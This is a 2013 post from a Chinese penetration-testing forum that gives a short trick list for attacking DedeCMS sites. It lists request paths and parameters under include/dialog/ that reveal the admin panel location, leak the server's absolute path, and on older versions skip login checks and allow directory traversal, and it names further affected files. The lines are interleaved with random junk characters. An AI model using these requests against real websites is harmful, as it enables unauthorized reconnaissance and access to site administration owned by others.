找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2108|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
9 |% F! F2 d' I0 _" G4 r4 t! u* b8 K0 M! T! R
员帐号,新版本的就直接转向了后台.1 ?2 F+ a* z2 I/ `, ?& C

; p' e7 g  k1 g  W2 G* W2.include/dialog/config.php会爆出后台管理路径
& b" Q6 u, W; P2 m! s
: n6 c% L& @) e1 Q3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录2 l3 O$ O8 j) R

* I6 q: b( R/ A4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
1 g% H, Q# `, Y' }7 g( r5 b( D9 V9 F# u6 D) l: A4 M& `6 M
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
- T& C5 F: D0 N. u$ [: B. H2 p2 f4 H2 j
到根目录去.不过这些版本的访问地址有些不同.( L5 B( }4 Z! t0 r5 E3 h; h4 `
地址为require/dialog/select_soft.php?activepath=/././././././././7 E- J+ z4 W4 V' C! A' |# t7 \

5 R7 a) s; y+ ^3 binclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..0 _3 L  ~( ^4 ?) E% a
存在相同问题的文件还有+ ]# @1 _! d% C- t! g
include\dialog\select_images.php
" E* @) Z" r( J% |include\dialog\select_media.php9 z  B) U# i1 T: O
include\dialog\select_templets.php​
" y/ ]8 C. v9 A: o) X
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表